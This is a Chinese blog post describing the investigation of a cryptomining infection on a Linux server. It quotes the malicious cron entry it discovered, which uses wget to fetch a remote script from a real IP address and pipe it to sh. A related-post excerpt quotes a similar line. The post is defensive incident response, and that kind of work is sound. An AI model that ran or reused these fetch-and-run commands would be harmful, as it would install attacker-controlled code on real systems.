一次挖矿病毒的排查过程

于 2024-06-06 16:11:32 发布
阅读量205 收藏 3
点赞数 2
分类专栏: 高效运维 文章标签: 挖矿
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u012069313/article/details/139498814
版权

目录

一、查看定时任务

# crontab -l
* * * * * wget -q -O - http://185.122.204.197/unk.sh | sh > /dev/null 2>&1
0 */1 * * * /usr/local/nginx/sbin/nginx -s reload

发现异常任务:

* * * * * wget -q -O - http://185.122.204.197/unk.sh | sh > /dev/null 2>&1

查 IP 发现为来自俄罗斯的恶意 IP:
在这里插入图片描述
在这里插入图片描述
查看主机环境变量已被更改,相关命令无法使用,且主机中异常计划任务早于2023-07-04 就已被植入:

# cat /var/spool/cron/root
* * * * * wget -q -O - http://185.122.204.197/unk.sh | sh > /dev/null 2>&1
0 */1 * * * /usr/local/nginx/sbin/nginx -s reload

# stat /var/spool/cron/root
  File: ‘/var/spool/cron/root’
  Size: 125       	Blocks: 8          IO Block: 4096   regular file
Device: fd01h/64769d	Inode: 552530      Links: 1
Access: (0600/-rw-------)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2024-06-06 10:39:22.013106004 +0800
Modify: 2023-07-04 12:50:46.478638868 +0800
Change: 2023-07-04 12:50:46.478638868 +0800

二、处理方法

清除异常任务,重启服务器。
由于重启前后,相关命令如ps、ls等都无法使用,最后重装系统!

奔跑吧邓邓子
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
一次OOM问题排查过程实战记录
08-26
一、OOM 问题排查过程概述 在 Java 应用程序中,OutOfMemoryError 是一种常见的异常,它可能是由于堆空间不足、永久代空间不足或是无法分配对象所引发的。在本文中,我们将通过一个实战记录,介绍如何排查 OOM 问题...
挖矿病毒zz.sh——记一次linux(centos)成为矿机后的排查与修复过程
热门推荐
m0_37313888的博客
09-27 1万+
我们工作组的主机集群某天被发现cpu利用率600%多,显然被种了后门来挖矿。写一下这篇文章来记录排查过程中遇到的问题。 1.怎么发现变矿机? 1)top 发现cpu炸了。这个也是常见的查看方法 2) netstat -natp 发现有几个异常的tcp连接,一查ip,发现是俄罗斯,荷兰的ip,估计主机被人种后门了 2.具体流程 crontab -l ,发现果然有一分钟一次的定时任务,...
服务器被挖矿程,处理过程
tooadmin的博客
12-25 2234
服务器被挖矿程,处理过程 出现kdevtmpfsi进程 1、top 命令查看所有的进程,发现CPU使用率最高进程 kdevtmpfsi kill 之后自动又被启动 2、crontab -e 查看定时任务发现出现了如下莫名的定时任务,做了删除处理 #* * * * * wget -q -O - http://195.3.146.118/unk.sh | sh > /dev/null 2>...
一次mysql死锁的排查过程
12-14
4. **程序逻辑优化**:在代码层面避免可能导致死锁的操作,如一次性获取所有需要的锁。 **总结** 了解死锁的原因和排查方法对于后端开发者至关重要。虽然我们不需要深入研究锁的源码,但熟悉基本的死锁原理和排查...
一次 Java 内存泄漏的排查解决过程详解
08-25
本文将详细介绍一次 Java 内存泄漏的排查解决过程,通过示例代码和实际案例,帮助读者更好地理解和排查 Java 内存泄漏。 一、问题描述 在本次值班中,我们的探测服务突然出现了大量的超时报警邮件,多数执行栈都在...
一次Mysql死锁排查过程的全纪录
12-16
之前接触到的数据库死锁,都是批量更新时加锁顺序不一致而导致的死锁,但是上周却遇到了一个很难理解的死锁。借着这个机会又重新学习了一下mysql的死锁知识以及常见的死锁场景。在多方调研以及和同事们的讨论下终于...
一次docker错误的耗时排查过程记录
01-09
客户是深信服的订制系统,基于 centos 改的,排查半天发现居然是文件损坏,而不是 docker 的问题。 环境信息 docker信息: $ docker info Containers: 0 Running: 0 Paused: 0 Stopped: 0 Images: 2 Server ...
一次Jvm old过高的排查过程实战记录
08-26
"Jvm Old区过高排查过程实战记录" 在这篇文章中,我们将探索Jvm Old区过高的排查过程。首先,我们需要了解Jvm的内存结构和垃圾回收机制。Jvm的内存结构可以分为年轻代(Young Generation)、老年代(Old ...
【案例】记一次线上内存报警排查过程1
08-03
1. 查一下 xx.xx.16.28 的内存使用情况 2. 排查最近是否有新上线服务,导致内存紧张 3. 排查是否有 Java 服务在持续 FGC 1. 以为
波特率漂移导致通信异常的故障排查过程
01-20
本文以UART协议为例,分享由于波特率漂移导致通信异常的故障排查过程。  什么是波特率漂移呢?可以理解为被测部件晶振有偏差,导致实际波特率和正常的波特率不一致。为什么波特率漂移会导致通信异常呢?本文从波形...
记录一次排查停电导致麒麟服务器启动不了故障详细过程
05-17
在IT运维过程中,服务器故障是常见但又棘手的问题,特别是当服务器因停电等外部因素导致无法正常启动时,需要进行一系列的排查和修复工作。本文以“停电导致麒麟服务器启动不了”的实例,详细介绍了故障排查及处理...
SEP出现问题排查过程.pdf
06-27
SEP出现问题排查过程 SEP出现问题排查过程是Symantec Endpoint Protection(SEP)软件的故障排查方法,旨在帮助用户快速解决SEP软件中的问题。本文将详细介绍SEP出现问题排查过程的步骤和相关知识点。 一、SEP日志...
C语言中程序时序问题的排查过程
07-30
在问题排查阶段,任何异常现象都可能是关键线索,要勇于尝试和验证假设,多次测试以确认解决方案。 通过这样的实践,开发者不仅可以修复具体问题,还能提升自己的调试技巧和编程能力,应对未来可能出现的各种挑战。...
测试环境内存溢出排查过程
10-30
日志
华为交换机排查arp病毒,命令及操作
最新发布
12-15
华为交换机排查 ARP 病毒命令及操作是指在华为交换机上检查和排除 ARP 病毒的命令和操作过程。ARP 病毒是一种网络病毒,它可以使网络中的设备无法正常工作,导致网络流量减慢甚至瘫痪。 ARP 病毒的表现形式: * ...
系统行为监控分析工具,木马病毒等非法程序排查的得力助手
02-23
1、从监控文件入手,当监控整个c盘时基本上可以找出所有正在操作的文件,可以...4、工具只有一个文件放任何目录运行即可,当前提供的是64位版本,32位系统请勿用。 5、更多功能请自己体验,有好的建议欢迎交流沟通。
一次django内存异常排查及解决方法
01-19
起因 Django 作为 Python著名的Web框架,相信...但是事情似乎并没有我想的那么简单,自己尝试用之前的的方法tracemalloc库进行问题的排查,但是问题来了实际的项目中有快一百多个接口,怎么排查?难道一个一个接口进
Linux:Java应用随着持续运行一段时间后,内存可用率逐渐减少的乌龙事件排查过程
01-09
二、 排查过程 整体的排查步骤如下: Java的堆内存和metaspace等内存排查。使用的工具是:Jconsole、JVisualVM、arthas、strace。 Java堆外内存分析排查。使用的命令:jcmd 进程的原生内存排查。使
linux挖矿病毒排查
12-07
Linux系统中挖矿病毒排查可以通过以下步骤进行: 1.使用top命令查看系统资源占用情况,如果发现CPU、内存、网络等资源占用率异常高,可能存在挖矿病毒。 2.使用netstat命令查看网络连接情况,如果发现大量连接到疑似挖矿池的IP地址,可能存在挖矿病毒。 3.使用ps命令查看进程情况,如果发现疑似挖矿程序的进程,可以使用kill命令结束进程。 4.使用clamscan命令对系统进行病毒扫描,可以检测出挖矿病毒等恶意软件。 5.使用安全加固工具对系统进行加固,例如关闭不必要的服务、更新系统补丁、设置防火墙等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

奔跑吧邓邓子

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值